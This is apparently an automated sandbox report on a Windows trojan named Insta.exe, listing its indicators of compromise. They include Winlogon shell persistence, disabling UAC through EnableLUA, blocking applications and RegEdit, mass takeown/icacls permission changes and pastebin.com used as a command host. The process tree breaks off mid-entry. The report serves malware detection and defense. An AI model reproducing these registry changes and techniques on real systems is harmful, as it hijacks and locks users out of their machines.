48846a5cce72fc0e5e95b20502090054f058102713608f9645a655e8fc46c18d

Analysis

max time kernel
101s
max time network
139s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
26-11-2024 09:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Insta.exe
Size

12.5MB
MD5

fe794ef01fc95b216dca533b7ccc8b4c
SHA1

07a5710f43b9e11c13d2ccc8f306c9385d7a9bae
SHA256

48846a5cce72fc0e5e95b20502090054f058102713608f9645a655e8fc46c18d
SHA512

134feb1e211223cd0fd00d575baaf2d5bc2d18be6ab8827df83a6ed12c8c05efee6cdf1c0798e3dfe0c459a114a2ceb4f09c445b31807129b2471aa69a82aa83
SSDEEP

196608:39RVHK+t1R5TYzj8YmmR9hAlh6A5/qJIERkOknerjb6hJGJzYx07KyfBYcr:33VHgzjmmpxAlM1RnahJMYx07KyJ

Score

10^/10

defense_evasion discovery evasion exploit persistence privilege_escalation trojan

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

Insta乗っ取り.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Windows\\System32\\Insta.exe"	Insta乗っ取り.exe

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocks application from running via registry modification 64 IoCs

Adds application to list of disallowed applications.

evasion

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe

Disables RegEdit via registry modification 1 IoCs

evasion

Processes:

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"

Disables Task Manager via registry modification
evasion

Possible privilege escalation attempt 64 IoCs

exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exe

pid	Process
6616
3992	icacls.exe
5348
6544
5416
5872
868	icacls.exe
7096	icacls.exe
7752	icacls.exe
6260	takeown.exe
7188
1792	takeown.exe
6272	takeown.exe
6180	takeown.exe
7832	takeown.exe
2844	takeown.exe
5276
7444	icacls.exe
6384
3496
3032
6200
1876	takeown.exe
6936	takeown.exe
5996
5704	icacls.exe
6708	icacls.exe
6972	icacls.exe
2920
7184	icacls.exe
6504
2900
6996
4396
4992	takeown.exe
2308	takeown.exe
5788
5356
7464	takeown.exe
1580	takeown.exe
5172
5332
6016	takeown.exe
6348	takeown.exe
2112
7992	takeown.exe
7368	icacls.exe
5716	icacls.exe
4452	takeown.exe
5080	takeown.exe
6332	icacls.exe
1092
6532	takeown.exe
7500	takeown.exe
5224
3520
5500
6496	takeown.exe
2432	takeown.exe
7264
4812
3132
4904	icacls.exe
7396	icacls.exe

Executes dropped EXE 1 IoCs

Processes:

Insta乗っ取り.exe

pid	Process
2916	Insta乗っ取り.exe

Loads dropped DLL 17 IoCs

Processes:

Insta乗っ取り.exe

pid	Process
2916	Insta乗っ取り.exe
2916	Insta乗っ取り.exe
2916	Insta乗っ取り.exe
2916	Insta乗っ取り.exe
2916	Insta乗っ取り.exe
2916	Insta乗っ取り.exe
2916	Insta乗っ取り.exe
2916	Insta乗っ取り.exe
2916	Insta乗っ取り.exe
2916	Insta乗っ取り.exe
2916	Insta乗っ取り.exe
2916	Insta乗っ取り.exe
2916	Insta乗っ取り.exe
2916	Insta乗っ取り.exe
2916	Insta乗っ取り.exe
2916	Insta乗っ取り.exe
2916	Insta乗っ取り.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exe

pid	Process
6308	icacls.exe
6680	icacls.exe
3276	takeown.exe
5832
952
1068	takeown.exe
7568	takeown.exe
5252
6276
6080	takeown.exe
6544
5872
5252	takeown.exe
7756	icacls.exe
2232	icacls.exe
3496
6348	takeown.exe
4376	icacls.exe
7040	icacls.exe
7444	icacls.exe
7128
5788
4648	icacls.exe
4980
7512
4516	icacls.exe
6404	icacls.exe
5744
5400	takeown.exe
2952
4468
4860	takeown.exe
4432
7672
5300
5244	icacls.exe
5156
1796
6892	takeown.exe
5448	icacls.exe
4064	icacls.exe
7368	icacls.exe
5884
4508	takeown.exe
6384
7292	icacls.exe
8164	icacls.exe
6592
6148
7340
5844
6724	takeown.exe
7816	takeown.exe
5892
5532	takeown.exe
6384
6328
5476	icacls.exe
7188
5416
6272	takeown.exe
6616
6460	takeown.exe
2432	takeown.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

Processes:

flow	ioc
7	pastebin.com
6	pastebin.com

Drops file in System32 directory 2 IoCs

Processes:

Insta乗っ取り.exe

description	ioc	Process
File created	C:\Windows\System32\Insta.exe	Insta乗っ取り.exe
File opened for modification	C:\Windows\System32\Insta.exe	Insta乗っ取り.exe

Embeds OpenSSL 1 IoCs

Embeds OpenSSL, may be used to circumvent TLS interception.

Processes:

resource	yara_rule
behavioral2/files/0x000a000000023b4f-78.dat	embeds_openssl

Event Triggered Execution: Screensaver 1 TTPs 5 IoCs

Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

persistence privilege_escalation

Screensaver

T1546.002

Processes:

reg.exereg.exereg.exereg.exereg.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Desktop\ScreenSaveActive = "1"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Desktop\ScreenSaverIsSecure = "1"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Desktop\SCRNSAVE.EXE = "C:\\Windows\\System32\\Mystify.scr"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Desktop\ScreenSaveActive = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Desktop\ScreenSaverIsSecure = "0"	reg.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001
Runs net.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Insta乗っ取り.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

description	pid	Process
Token: SeDebugPrivilege	2916	Insta乗っ取り.exe
Token: SeTakeOwnershipPrivilege	548	takeown.exe
Token: SeTakeOwnershipPrivilege	2720	takeown.exe
Token: SeTakeOwnershipPrivilege	3276	takeown.exe
Token: SeTakeOwnershipPrivilege	916	takeown.exe
Token: SeTakeOwnershipPrivilege	2220	takeown.exe
Token: SeTakeOwnershipPrivilege	1792	takeown.exe
Token: SeTakeOwnershipPrivilege	3340	takeown.exe
Token: SeTakeOwnershipPrivilege	2168	takeown.exe
Token: SeTakeOwnershipPrivilege	4508	takeown.exe
Token: SeTakeOwnershipPrivilege	3600	takeown.exe
Token: SeTakeOwnershipPrivilege	64	takeown.exe
Token: SeTakeOwnershipPrivilege	3520	takeown.exe
Token: SeTakeOwnershipPrivilege	3740	takeown.exe
Token: SeTakeOwnershipPrivilege	6272	takeown.exe
Token: SeTakeOwnershipPrivilege	7308	takeown.exe
Token: SeTakeOwnershipPrivilege	7464	takeown.exe
Token: SeTakeOwnershipPrivilege	7820	takeown.exe
Token: SeTakeOwnershipPrivilege	8000	takeown.exe
Token: SeTakeOwnershipPrivilege	8148	takeown.exe
Token: SeTakeOwnershipPrivilege	8064	takeown.exe
Token: SeTakeOwnershipPrivilege	7864	takeown.exe
Token: SeTakeOwnershipPrivilege	4452	takeown.exe
Token: SeTakeOwnershipPrivilege	8076	takeown.exe
Token: SeTakeOwnershipPrivilege	8016	takeown.exe
Token: SeTakeOwnershipPrivilege	3800	takeown.exe
Token: SeTakeOwnershipPrivilege	5176	takeown.exe
Token: SeTakeOwnershipPrivilege	2300	takeown.exe
Token: SeTakeOwnershipPrivilege	6272	takeown.exe
Token: SeTakeOwnershipPrivilege	6804	takeown.exe
Token: SeTakeOwnershipPrivilege	2900	takeown.exe
Token: SeTakeOwnershipPrivilege	5440	takeown.exe
Token: SeTakeOwnershipPrivilege	7992	takeown.exe
Token: SeTakeOwnershipPrivilege	5080	takeown.exe
Token: SeTakeOwnershipPrivilege	6532	takeown.exe
Token: SeTakeOwnershipPrivilege	3780	takeown.exe
Token: SeTakeOwnershipPrivilege	5844	takeown.exe
Token: SeTakeOwnershipPrivilege	6080	takeown.exe
Token: SeTakeOwnershipPrivilege	6348	takeown.exe
Token: SeTakeOwnershipPrivilege	1980	takeown.exe
Token: SeTakeOwnershipPrivilege	6744	takeown.exe
Token: SeTakeOwnershipPrivilege	5396	takeown.exe
Token: SeTakeOwnershipPrivilege	1160	takeown.exe
Token: SeTakeOwnershipPrivilege	8148	takeown.exe
Token: SeTakeOwnershipPrivilege	5468	takeown.exe
Token: SeTakeOwnershipPrivilege	5776	takeown.exe
Token: SeTakeOwnershipPrivilege	6800	takeown.exe
Token: SeTakeOwnershipPrivilege	6160	takeown.exe
Token: SeTakeOwnershipPrivilege	6460	takeown.exe
Token: SeTakeOwnershipPrivilege	6600	takeown.exe
Token: SeTakeOwnershipPrivilege	1512	takeown.exe
Token: SeTakeOwnershipPrivilege	5428	takeown.exe
Token: SeTakeOwnershipPrivilege	5484	takeown.exe
Token: SeTakeOwnershipPrivilege	4232	takeown.exe
Token: SeTakeOwnershipPrivilege	5456	takeown.exe
Token: SeTakeOwnershipPrivilege	8020	takeown.exe
Token: SeTakeOwnershipPrivilege	4716	takeown.exe
Token: SeTakeOwnershipPrivilege	4860	takeown.exe
Token: SeTakeOwnershipPrivilege	8076	takeown.exe
Token: SeTakeOwnershipPrivilege	3496	takeown.exe
Token: SeTakeOwnershipPrivilege	5748	takeown.exe
Token: SeTakeOwnershipPrivilege	6480	takeown.exe
Token: SeTakeOwnershipPrivilege	2968	takeown.exe
Token: SeTakeOwnershipPrivilege	6512	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Insta.exeInsta乗っ取り.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 2216 wrote to memory of 2916	2216	Insta.exe	83
PID 2216 wrote to memory of 2916	2216	Insta.exe	83
PID 2916 wrote to memory of 3960	2916	Insta乗っ取り.exe	84
PID 2916 wrote to memory of 3960	2916	Insta乗っ取り.exe	84
PID 2916 wrote to memory of 3732	2916	Insta乗っ取り.exe	86
PID 2916 wrote to memory of 3732	2916	Insta乗っ取り.exe	86
PID 3732 wrote to memory of 1836	3732	cmd.exe	88
PID 3732 wrote to memory of 1836	3732	cmd.exe	88
PID 2916 wrote to memory of 3496	2916	Insta乗っ取り.exe	95
PID 2916 wrote to memory of 3496	2916	Insta乗っ取り.exe	95
PID 2916 wrote to memory of 2344	2916	Insta乗っ取り.exe	98
PID 2916 wrote to memory of 2344	2916	Insta乗っ取り.exe	98
PID 2916 wrote to memory of 4292	2916	Insta乗っ取り.exe	100
PID 2916 wrote to memory of 4292	2916	Insta乗っ取り.exe	100
PID 2916 wrote to memory of 4692	2916	Insta乗っ取り.exe	102
PID 2916 wrote to memory of 4692	2916	Insta乗っ取り.exe	102
PID 2916 wrote to memory of 416	2916	Insta乗っ取り.exe	104
PID 2916 wrote to memory of 416	2916	Insta乗っ取り.exe	104
PID 2916 wrote to memory of 1288	2916	Insta乗っ取り.exe	106
PID 2916 wrote to memory of 1288	2916	Insta乗っ取り.exe	106
PID 2916 wrote to memory of 3992	2916	Insta乗っ取り.exe	108
PID 2916 wrote to memory of 3992	2916	Insta乗っ取り.exe	108
PID 2916 wrote to memory of 2960	2916	Insta乗っ取り.exe	110
PID 2916 wrote to memory of 2960	2916	Insta乗っ取り.exe	110
PID 2916 wrote to memory of 3132	2916	Insta乗っ取り.exe	112
PID 2916 wrote to memory of 3132	2916	Insta乗っ取り.exe	112
PID 2916 wrote to memory of 1072	2916	Insta乗っ取り.exe	114
PID 2916 wrote to memory of 1072	2916	Insta乗っ取り.exe	114
PID 2916 wrote to memory of 4376	2916	Insta乗っ取り.exe	116
PID 2916 wrote to memory of 4376	2916	Insta乗っ取り.exe	116
PID 2916 wrote to memory of 2912	2916	Insta乗っ取り.exe	118
PID 2916 wrote to memory of 2912	2916	Insta乗っ取り.exe	118
PID 2916 wrote to memory of 4316	2916	Insta乗っ取り.exe	120
PID 2916 wrote to memory of 4316	2916	Insta乗っ取り.exe	120
PID 4316 wrote to memory of 548	4316	cmd.exe	122
PID 4316 wrote to memory of 548	4316	cmd.exe	122
PID 2916 wrote to memory of 596	2916	Insta乗っ取り.exe	123
PID 2916 wrote to memory of 596	2916	Insta乗っ取り.exe	123
PID 596 wrote to memory of 2720	596	cmd.exe	125
PID 596 wrote to memory of 2720	596	cmd.exe	125
PID 2916 wrote to memory of 3112	2916	Insta乗っ取り.exe	126
PID 2916 wrote to memory of 3112	2916	Insta乗っ取り.exe	126
PID 3112 wrote to memory of 3276	3112	cmd.exe	128
PID 3112 wrote to memory of 3276	3112	cmd.exe	128
PID 2916 wrote to memory of 1988	2916	Insta乗っ取り.exe	129
PID 2916 wrote to memory of 1988	2916	Insta乗っ取り.exe	129
PID 1988 wrote to memory of 916	1988	cmd.exe	131
PID 1988 wrote to memory of 916	1988	cmd.exe	131
PID 2916 wrote to memory of 1848	2916	Insta乗っ取り.exe	132
PID 2916 wrote to memory of 1848	2916	Insta乗っ取り.exe	132
PID 1848 wrote to memory of 1620	1848	cmd.exe	134
PID 1848 wrote to memory of 1620	1848	cmd.exe	134
PID 2916 wrote to memory of 4584	2916	Insta乗っ取り.exe	135
PID 2916 wrote to memory of 4584	2916	Insta乗っ取り.exe	135
PID 4584 wrote to memory of 2220	4584	cmd.exe	137
PID 4584 wrote to memory of 2220	4584	cmd.exe	137
PID 2916 wrote to memory of 3428	2916	Insta乗っ取り.exe	138
PID 2916 wrote to memory of 3428	2916	Insta乗っ取り.exe	138
PID 3428 wrote to memory of 1792	3428	cmd.exe	140
PID 3428 wrote to memory of 1792	3428	cmd.exe	140
PID 2916 wrote to memory of 920	2916	Insta乗っ取り.exe	141
PID 2916 wrote to memory of 920	2916	Insta乗っ取り.exe	141
PID 920 wrote to memory of 3340	920	cmd.exe	143
PID 920 wrote to memory of 3340	920	cmd.exe	143

C:\Users\Admin\AppData\Local\Temp\Insta.exe
"C:\Users\Admin\AppData\Local\Temp\Insta.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2216
- C:\Users\Admin\AppData\Local\Temp\onefile_2216_133770884885000680\Insta乗っ取り.exe
  C:\Users\Admin\AppData\Local\Temp\Insta.exe
  2⤵
  - Modifies WinLogon for persistence
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c
    3⤵
    PID:3960
- - C:\Windows\system32\cmd.exe
